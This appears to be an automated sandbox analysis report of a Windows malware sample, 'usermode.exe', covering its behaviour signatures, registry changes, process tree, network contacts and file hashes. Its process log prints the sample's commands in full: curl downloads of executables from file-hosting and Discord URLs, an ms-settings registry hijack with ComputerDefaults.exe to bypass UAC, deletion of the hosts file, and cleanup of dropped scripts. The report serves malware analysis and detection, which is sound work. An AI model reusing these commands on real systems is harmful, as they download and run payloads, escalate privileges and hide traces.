Analysis Overview
SHA256
f63734e8c099081fb6f7386aaa960667e297a0b323d7b583d1a2cfcd974353dd
Threat Level: Likely malicious
The file usermode.exe was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
VMProtect packed file
Executes dropped EXE
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 13:56
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 13:56
Reported
2024-10-30 13:57
Platform
win11-20241007-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\secret.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\secret.exe | C:\Windows\system32\curl.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\168587.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\542700.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe" >nul 2>&1
C:\Windows\system32\curl.exe
curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\secret.exe
C:\Windows\System32\secret.exe
C:\Windows\System32\secret.exe
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\542700.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\542700.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\168587.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\168587.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf" >nul 2>&1
C:\Windows\system32\curl.exe
curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| N/A | 127.0.0.1:49751 | N/A | tcp |
| US | 8.8.8.8:53 | 35.20.181.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.220.187:443 | matchashop.icu | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 104.21.79.145:443 | textpubshiers.top | tcp |
| N/A | 127.0.0.1:49798 | N/A | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
Files
memory/3908-0-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp
memory/3908-1-0x00007FF8E1A70000-0x00007FF8E1A72000-memory.dmp
memory/3908-2-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp
memory/3908-5-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp
C:\Windows\System32\secret.exe
| Hash | Value |
| --- | --- |
| MD5 | 68487b48506703ac72bf48e57a5f6ffa |
| SHA1 | 7eb5a51f8ecead1e555d79db58bb43e61264b51b |
| SHA256 | f3ecc9924b3a625fcc54d59008706e41c830c6952bf836e77352a340251c8cae |
| SHA512 | 033f745e1c289ad4cd69b1494962fd6260484cb300c7556d76635908dbc5f54e626b5c21e130058c5d84b5978eff3628dd6fd8b56e35bf37c0a6f866ffb8cbb0 |
memory/3400-10-0x000001F6A0400000-0x000001F6A0401000-memory.dmp
memory/3400-11-0x000001F6A0410000-0x000001F6A0411000-memory.dmp
memory/3400-12-0x000001F6A1D20000-0x000001F6A1D21000-memory.dmp
memory/3908-14-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp
memory/3908-15-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp
memory/3400-16-0x000001F6A1D40000-0x000001F6A1D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\542700.vbs
| Hash | Value |
| --- | --- |
| MD5 | 8b4ed5c47fdddbeba260ef11cfca88c6 |
| SHA1 | 868f11f8ed78ebe871f9da182d053f349834b017 |
| SHA256 | 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5 |
| SHA512 | 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf |
C:\Users\Admin\AppData\Local\Temp\168587.vbs
| Hash | Value |
| --- | --- |
| MD5 | 0b4570ab9e0b9b3a1c729d2dfe4269cf |
| SHA1 | d8f47021a2000ec2160cfceeb59654d28d3b7ba4 |
| SHA256 | d4aec27b2377d3267c10348eaacfaa97dbb2ca0c3f0f5170d905301a77ae0f9d |
| SHA512 | 0adf851c389281cbd1c28a6ac08691179dec2a536f1d68ce46a621e5d234dbb5cd826aaea2193a674e1396fdaa745f21fba9988cb2cb19736d0c153f3b86422e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
| Hash | Value |
| --- | --- |
| MD5 | 925efe96cdd4c38990ce77cf97f5218f |
| SHA1 | 6deeb34ba43549ac8a7d6b545257e6df64e29495 |
| SHA256 | c0f88af9fb0d75921f09ead45882adb82a2b1222d728de0f10ae8a875ee757a4 |
| SHA512 | 3d7a24dea82a9908ed599680dbe1caeadbee5cb04aa06a4c6310ceccd8f98f8ca9f0666434d48945e44ec48c3f4ef21d3c23df4252b4d5792995a4b1892014d3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| Hash | Value |
| --- | --- |
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| Hash | Value |
| --- | --- |
| MD5 | bd34d3e89ca124297388a6e74ba69449 |
| SHA1 | 54742685dfa4f520e2e93b2024629c91c925ccfb |
| SHA256 | 4173a607877121ad103b1018726634f0d28bf6ca7ac86be683f162a6abbacd7b |
| SHA512 | 700573da5a8fb38ee6fc9f92b45f33d2d2a0ac6610eb572ef0cb164c686164d5dbdf07e1012606f57cad64102b00fc443fa9c1031d517d0d7c9cf5ab8593eb2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| Hash | Value |
| --- | --- |
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| Hash | Value |
| --- | --- |
| MD5 | 3bf53b7cb0ef14526332140e3f06e30e |
| SHA1 | 73684a2e322f714d3cf7396cc467f4b2fbe48c60 |
| SHA256 | 63d7227e22957e115ece214bf46e427d95782e2ed7c5be04b43bad30a50d9014 |
| SHA512 | 82728bb630791419f845e5a1a9a67b210fb4065f9603616aca1d9446d080028a0a64bed10d5e405f453e32fbf5d31fb020a9ec38ba9ca01e843c97fe437c3eee |